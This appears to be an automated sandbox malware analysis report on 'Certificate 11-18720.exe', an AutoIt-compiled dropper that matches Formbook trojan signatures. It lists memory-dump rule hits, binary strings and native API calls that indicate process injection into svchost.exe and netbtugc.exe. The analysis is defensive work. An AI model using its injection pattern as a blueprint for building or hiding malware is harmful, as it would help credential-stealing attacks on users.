            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe Code function: This is a third-party compiled AutoIt script. 0_2_005C3D19
            Source: Certificate 11-18720.exe String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Certificate 11-18720.exe, 00000000.00000000.1677354791.000000000066E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.memstr_83ddf722-c
            Source: Certificate 11-18720.exe, 00000000.00000000.1677354791.000000000066E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: _SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9a7af845-5
            Source: Certificate 11-18720.exe String found in binary or memory: This is a third-party compiled AutoIt script.memstr_c3eafab4-2
            Source: Certificate 11-18720.exe String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_397da7d6-d
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042B363 NtClose,1_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872B60 NtClose,LdrInitializeThunk,1_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03872C70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk,1_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03874340 NtSetContextThread,1_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03874650 NtSuspendThread,1_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872B80 NtQueryInformationFile,1_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872BA0 NtEnumerateValueKey,1_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872BE0 NtQueryValueKey,1_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872BF0 NtAllocateVirtualMemory,1_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872AB0 NtWaitForSingleObject,1_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872AD0 NtReadFile,1_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872AF0 NtWriteFile,1_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872F90 NtProtectVirtualMemory,1_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872FA0 NtQuerySection,1_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872FB0 NtResumeThread,1_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872FE0 NtCreateFile,1_2_03872FE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872F30 NtCreateSection,1_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872F60 NtCreateProcessEx,1_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872E80 NtReadVirtualMemory,1_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872EA0 NtAdjustPrivilegesToken,1_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872EE0 NtQueueApcThread,1_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872E30 NtWriteVirtualMemory,1_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872DB0 NtEnumerateKey,1_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872DD0 NtDelayExecution,1_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872D00 NtSetInformationFile,1_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872D10 NtMapViewOfSection,1_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872D30 NtUnmapViewOfSection,1_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872CA0 NtQueryInformationToken,1_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872CC0 NtQueryVirtualMemory,1_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872CF0 NtOpenProcess,1_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872C00 NtQueryInformationProcess,1_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872C60 NtCreateKey,1_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03873090 NtSetValueKey,1_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03873010 NtOpenDirectoryObject,1_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038739B0 NtGetContextThread,1_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03873D10 NtOpenProcessToken,1_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03873D70 NtOpenThread,1_2_03873D70
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D74340 NtSetContextThread,LdrInitializeThunk,3_2_02D74340
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D74650 NtSuspendThread,LdrInitializeThunk,3_2_02D74650
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72AD0 NtReadFile,LdrInitializeThunk,3_2_02D72AD0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72AF0 NtWriteFile,LdrInitializeThunk,3_2_02D72AF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_02D72BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72BE0 NtQueryValueKey,LdrInitializeThunk,3_2_02D72BE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_02D72BA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72B60 NtClose,LdrInitializeThunk,3_2_02D72B60
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72EE0 NtQueueApcThread,LdrInitializeThunk,3_2_02D72EE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_02D72E80
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72FE0 NtCreateFile,LdrInitializeThunk,3_2_02D72FE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72FB0 NtResumeThread,LdrInitializeThunk,3_2_02D72FB0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72F30 NtCreateSection,LdrInitializeThunk,3_2_02D72F30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_02D72CA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_02D72C70
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72C60 NtCreateKey,LdrInitializeThunk,3_2_02D72C60
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72DD0 NtDelayExecution,LdrInitializeThunk,3_2_02D72DD0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_02D72DF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72D10 NtMapViewOfSection,LdrInitializeThunk,3_2_02D72D10
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_02D72D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_02D72D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D735C0 NtCreateMutant,LdrInitializeThunk,3_2_02D735C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D739B0 NtGetContextThread,LdrInitializeThunk,3_2_02D739B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72AB0 NtWaitForSingleObject,3_2_02D72AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72B80 NtQueryInformationFile,3_2_02D72B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72EA0 NtAdjustPrivilegesToken,3_2_02D72EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72E30 NtWriteVirtualMemory,3_2_02D72E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72F90 NtProtectVirtualMemory,3_2_02D72F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72FA0 NtQuerySection,3_2_02D72FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72F60 NtCreateProcessEx,3_2_02D72F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72CC0 NtQueryVirtualMemory,3_2_02D72CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72CF0 NtOpenProcess,3_2_02D72CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72C00 NtQueryInformationProcess,3_2_02D72C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72DB0 NtEnumerateKey,3_2_02D72DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D72D00 NtSetInformationFile,3_2_02D72D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D73090 NtSetValueKey,3_2_02D73090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D73010 NtOpenDirectoryObject,3_2_02D73010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D73D70 NtOpenThread,3_2_02D73D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D73D10 NtOpenProcessToken,3_2_02D73D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00477920 NtCreateFile,3_2_00477920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00477A70 NtReadFile,3_2_00477A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00477B50 NtDeleteFile,3_2_00477B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00477BE0 NtClose,3_2_00477BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00477D30 NtAllocateVirtualMemory,3_2_00477D30
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00606606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00606606
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005FACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_005FACC5
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006079D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006079D3
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005EB0430_2_005EB043
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005D32000_2_005D3200
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005D3B700_2_005D3B70
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F410F0_2_005F410F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E02A40_2_005E02A4
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F038E0_2_005F038E
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005CE3B00_2_005CE3B0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F467F0_2_005F467F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E06D90_2_005E06D9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0062AACE0_2_0062AACE
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F4BEF0_2_005F4BEF
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005ECCC10_2_005ECCC1
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005CAF500_2_005CAF50
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C6F070_2_005C6F07
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DB11F0_2_005DB11F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006231BC0_2_006231BC
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005ED1B90_2_005ED1B9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F724D0_2_005F724D
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E123A0_2_005E123A
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006013CA0_2_006013CA
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C93F00_2_005C93F0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DF5630_2_005DF563
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C96C00_2_005C96C0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060B6CC0_2_0060B6CC
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0062F7FF0_2_0062F7FF
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C77B00_2_005C77B0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F79C90_2_005F79C9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DFA570_2_005DFA57
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C9B600_2_005C9B60
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C7D190_2_005C7D19
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DFE6F0_2_005DFE6F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E9ED00_2_005E9ED0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C7FA30_2_005C7FA3
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00F476280_2_00F47628
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168711_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168731_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028A01_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101731_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011101_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E1F31_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012901_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004035001_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040268A1_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026981_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026A01_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF4A1_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D7531_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF531_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F01_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039003E61_2_039003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA3521_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C02C01_2_038C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E02741_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F41A21_2_038F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039001AA1_2_039001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F81CC1_2_038F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038301001_2_03830100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA1181_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C81581_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D20001_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C01_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038647501_2_03864750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038407701_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C6E01_2_0385C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039005911_2_03900591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038405351_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EE4F61_2_038EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E44201_2_038E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F24461_2_038F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F6BD71_2_038F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB401_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA801_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A01_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390A9A61_2_0390A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038569621_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038268B81_2_038268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E8F01_2_0386E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384A8401_2_0384A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038428401_2_03842840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BEFA01_2_038BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832FC81_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03882F281_2_03882F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860F301_2_03860F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E2F301_2_038E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4F401_2_038B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852E901_2_03852E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FCE931_2_038FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEEDB1_2_038FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEE261_2_038FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840E591_2_03840E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03858DBF1_2_03858DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383ADE01_2_0383ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384AD001_2_0384AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DCD1F1_2_038DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0CB51_2_038E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830CF21_2_03830CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840C001_2_03840C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0388739A1_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F132D1_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382D34C1_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038452A01_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B2C01_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E12ED1_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385D2F01_2_0385D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384B1B01_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387516C1_2_0387516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382F1721_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390B16B1_2_0390B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EF0CC1_2_038EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038470C01_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F70E91_2_038F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF0E01_2_038FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF7B01_2_038FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F16CC1_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038856301_2_03885630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DD5B01_2_038DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039095C31_2_039095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F75711_2_038F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF43F1_2_038FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038314601_2_03831460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FB801_2_0385FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B5BF01_2_038B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387DBF91_2_0387DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFB761_2_038FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DDAAC1_2_038DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03885AA01_2_03885AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E1AA31_2_038E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EDAC61_2_038EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFA491_2_038FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7A461_2_038F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B3A6C1_2_038B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D59101_2_038D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038499501_2_03849950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B9501_2_0385B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038438E01_2_038438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AD8001_2_038AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03841F921_2_03841F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFFB11_2_038FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD21_2_03803FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD51_2_03803FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFF091_2_038FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03849EB01_2_03849EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FDC01_2_0385FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03843D401_2_03843D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F1D5A1_2_038F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7D731_2_038F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFCF21_2_038FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B9C321_2_038B9C32
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C633172_2_05C63317
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C6B9E52_2_05C6B9E5
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C6B9E32_2_05C6B9E3
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C650C52_2_05C650C5
